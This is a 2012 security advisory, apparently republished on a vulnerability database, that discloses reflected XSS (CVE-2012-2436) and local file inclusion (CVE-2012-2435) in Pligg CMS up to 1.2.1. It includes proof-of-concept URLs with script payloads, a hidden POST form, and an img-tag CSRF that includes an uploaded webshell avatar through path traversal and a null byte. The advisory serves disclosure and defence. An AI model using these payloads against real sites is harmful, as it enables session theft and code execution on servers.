Lucene search

K
htbridgeHigh-Tech BridgeHTB23089
HistoryApr 25, 2012 - 12:00 a.m.

Multiple vulnerabilities in Pligg CMS

2012-04-2500:00:00
High-Tech Bridge
www.htbridge.com
24

0.013 Low

EPSS

Percentile

86.0%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pligg CMS , which can be exploited to perform Cross-Site Scripting (XSS) and Local File Inclusion attacks.

  1. Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436
    1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here= %3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_h ere=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    1.2 Input passed via the “karma_username” POST parameter to module.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    <form action=“http://[host]/module.php?module=karma” method=“post” name=“main” id=“main”>
    <input type=“hidden” name=“karma_value” value=“1”>
    <input type=“hidden” name=“karma_username” value=“<script>alert(document.cookie);</script>”>
    <input type=“submit” name=“submit” id=“btn” value=“submit”>
    </form>
    1.3 Input passed via the “q_1_low”. “q_1_high”, “q_2_low”, “q_2_high” GET parameters to module.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_lo w=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_hi gh=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_lo w=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_hi gh=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    1.4 Input passed via the “edit” GET parameter to module.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://[host]/module.php?module=admin_language&mode=edit&edit=%3Cscript%3Eal ert%28document.cookie%29;%3C/script%3E

  2. Local File Inclusion in Pligg CMS: CVE-2012-2435
    2.1 Input passed via the “captcha” GET parameter to module.php is not properly verified before being used in include_once() function and can be exploited to include arbitrary or previously uploaded local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL byte, however successful exploitation of this vulnerability requires administrative privileges. Therefore the most appropriate vector of exploitation is CSRF.
    The attacker should register in the system, upload a “.jpg” avatar with malicious content (e.g. PHP webshell upload) and make logged-in administrator visit a specially crafted web page that exploits Local File Inclusion via CSRF. For example this PoC (Proof of Concept):
    <img src=“http://[host]/module.php?module=captcha&action=configure&captcha=…/…/ …/avatars/user_uploaded/[USER_ID]_original.jpg%00”>
    Successful exploitation of this vulnerability requires that “magic_quotes_gpc” is off.

CPENameOperatorVersion
pligg cms le1.2.1

0.013 Low

EPSS

Percentile

86.0%